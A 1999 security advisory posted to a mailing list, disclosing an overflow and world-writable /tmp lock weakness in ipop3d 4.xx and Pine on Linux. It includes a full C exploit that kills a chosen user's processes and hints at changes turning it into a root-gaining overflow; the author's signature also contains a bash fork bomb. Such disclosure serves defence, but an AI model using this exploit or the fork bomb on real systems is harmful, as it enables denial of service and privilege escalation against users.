Date: Sun, 7 Mar 1999 01:41:25 +0100 From: Michal Zalewski Overflow in CAC.Washington.EDU ipop3d 4.xx CAC.Washington.EDU ipop3d 4.xx, at least on Linux platform, has serious security hole. When data is read from so-called mailbox lock created in /tmp directory (this happens under certain conditions - please refer exploit code below), it's stored in _too_small_ buffer. It is possible to overwrite some data, and registers as well. For testing purposes, simple exploit code presented below could be used - suggested changes: write(i,"-1",2) -> write(i,"(about 1100 b)",1100) truncate(i,2) -> truncate(i,1100); Exploited overflow in ipop3d could be used to gain superuser access (the only thing done by ipop3d is setuid+setgid, no seteuid/setreuid). CAC.Washington.EDU ipop3d is shipped by default with Red Hat Linux, included in IMAP package. Solution: you have to look for something like kill(i,SIGUSR2) in sources and modify lines just before it ;> The problem is probably well known, but silently ignored by pine vendors. Unfortunately, it's possible to turn 'mostly harmless feature' in something nasty - following code allows various DoSes by killing all processes of luser (could be root?) every time he/she runs pine or receives mail via POP3 protocol: -- lock-exploit.c -- // Pine 4.xx, ipop3d 4.xx and other /tmp-lock based mail stuff. #include #include #include main(int argc,char* argv[]) { int i,a=0; char s[100]; struct stat x; if (!argv[1]) exit(printf("Usage: %s account_name\n",argv[0])); sprintf(s,"/var/spool/mail/%s",argv[1]); if (stat(s,&x)) exit(printf("Mailbox (%s) not found.\n",s)); sprintf(s,"/tmp/.%x.%x",(int)x.st_dev,(int)x.st_ino); fchmod(i=open(s,O_RDWR|O_CREAT,0600),0666); while (1) { lseek(i,0,0); write(i,"-1",2); ftruncate(i,2); fsync(i); if (!a++) if (!flock(i,LOCK_EX)) printf("Got lock on %s.\n",s); else printf("File %s already locked, wait...\n",s); sleep(1); } } -- eof -- Works well under Linux. Under BSD, pine seems to have broken mailbox access negotiation (fortunately ;-). No information about ipop3d. Mainly, this vunerability demonstrates that world-writable mailbox locks in /tmp are SICK IDEA (one day, as I recall, one of pine vendors said it's 'harmless', while other solutions allows several DoS attacks... huh). - _______________________________________________________________________ Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM] [Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};: [voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]